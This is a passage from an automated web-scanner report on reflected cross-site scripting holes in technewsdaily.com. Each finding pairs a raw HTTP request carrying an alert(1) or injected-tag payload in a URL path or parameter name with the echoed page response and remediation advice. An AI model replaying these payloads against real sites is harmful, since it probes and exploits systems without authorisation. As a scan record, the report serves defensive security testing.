User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62439

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/?37e1a'-alert(1)-'03372dc3979=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.66. http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /hologram-technology-nearly-reality-1560/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6553a'-alert(1)-'13e7f170564 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hologram-technology-nearly-reality-15606553a'-alert(1)-'13e7f170564/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40476

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/hologram-technology-nearly-reality-15606553a'-alert(1)-'13e7f170564/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.67. http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /hologram-technology-nearly-reality-1560/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c01d'-alert(1)-'63a484c05d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hologram-technology-nearly-reality-1560/?9c01d'-alert(1)-'63a484c05d8=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/?9c01d'-alert(1)-'63a484c05d8=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.68. http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /hologram-technology-nearly-reality-1560/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57fae"><a>837fc77ccfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hologram-technology-nearly-reality-1560/?57fae"><a>837fc77ccfd=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65540

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/?57fae"><a>837fc77ccfd=1/" />
...[SNIP]...

1.69. http://www.technewsdaily.com/how-4g-works-100128-0121/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-4g-works-100128-0121/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a2f'-alert(1)-'d62d319774c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-4g-works-100128-012197a2f'-alert(1)-'d62d319774c/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-4g-works-100128-012197a2f'-alert(1)-'d62d319774c/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.70. http://www.technewsdaily.com/how-4g-works-100128-0121/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /how-4g-works-100128-0121/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e069"><a>85a55c9ce0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /how-4g-works-100128-0121/?4e069"><a>85a55c9ce0a=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/how-4g-works-100128-0121/?4e069"><a>85a55c9ce0a=1/" />
...[SNIP]...

1.71. http://www.technewsdaily.com/how-4g-works-100128-0121/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-4g-works-100128-0121/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84dd1'-alert(1)-'4ab52d184db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-4g-works-100128-0121/?84dd1'-alert(1)-'4ab52d184db=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 60714

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-4g-works-100128-0121/?84dd1'-alert(1)-'4ab52d184db=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.72. http://www.technewsdaily.com/how-imax-works-0320/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-imax-works-0320/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4de0c'-alert(1)-'7508d792c75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-imax-works-03204de0c'-alert(1)-'7508d792c75/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-imax-works-03204de0c'-alert(1)-'7508d792c75/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.73. http://www.technewsdaily.com/how-imax-works-0320/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-imax-works-0320/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3fd8'-alert(1)-'b05cace007e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-imax-works-0320/?f3fd8'-alert(1)-'b05cace007e=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61432

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-imax-works-0320/?f3fd8'-alert(1)-'b05cace007e=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.74. http://www.technewsdaily.com/how-imax-works-0320/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /how-imax-works-0320/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 637d5"><a>f68d861064f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /how-imax-works-0320/?637d5"><a>f68d861064f=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61794

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/how-imax-works-0320/?637d5"><a>f68d861064f=1/" />
...[SNIP]...

1.75. http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-deauthorize-a-computer-from-itunes-remotely-1280/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d815'-alert(1)-'69061a5d1c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-deauthorize-a-computer-from-itunes-remotely-12809d815'-alert(1)-'69061a5d1c5/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40508

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ext/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-12809d815'-alert(1)-'69061a5d1c5/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.76. http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-deauthorize-a-computer-from-itunes-remotely-1280/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795d2'-alert(1)-'c96f0495c67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-deauthorize-a-computer-from-itunes-remotely-1280/?795d2'-alert(1)-'c96f0495c67=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
t/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/?795d2'-alert(1)-'c96f0495c67=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.77. http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /how-to-deauthorize-a-computer-from-itunes-remotely-1280/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f3e0"><a>be6b7a008ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /how-to-deauthorize-a-computer-from-itunes-remotely-1280/?6f3e0"><a>be6b7a008ac=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
